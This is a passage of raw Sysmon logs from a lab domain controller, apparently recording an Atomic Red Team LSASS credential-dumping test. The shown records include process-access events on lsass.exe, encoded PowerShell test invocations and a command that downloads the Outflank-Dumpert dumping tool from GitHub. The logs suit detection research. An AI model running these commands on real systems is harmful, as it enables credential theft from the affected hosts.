1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004380Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.467{D28789B6-7CD2-5FA1-DB00-000000008801}2764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe) -Force | Out-Null Invoke-WebRequest \""https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe\"" -OutFile C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004379Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.327{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004378Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.327{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.280{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5kzkdru2.och.ps12020-11-03 15:52:50.280 10341000x80000000000000004376Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.265{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004375Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004374Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004373Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004372Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004371Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004370Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004369Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004368Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004367Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004366Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004365Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004363Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.249{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004362Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.251{D28789B6-7CD2-5FA1-DA00-000000008801}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004361Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.092{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004360Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.092{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004359Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:50.061{D28789B6-7CD2-5FA1-D900-000000008801}1556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_st05bfwo.qiu.ps12020-11-03 15:52:50.061 10341000x80000000000000004358Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 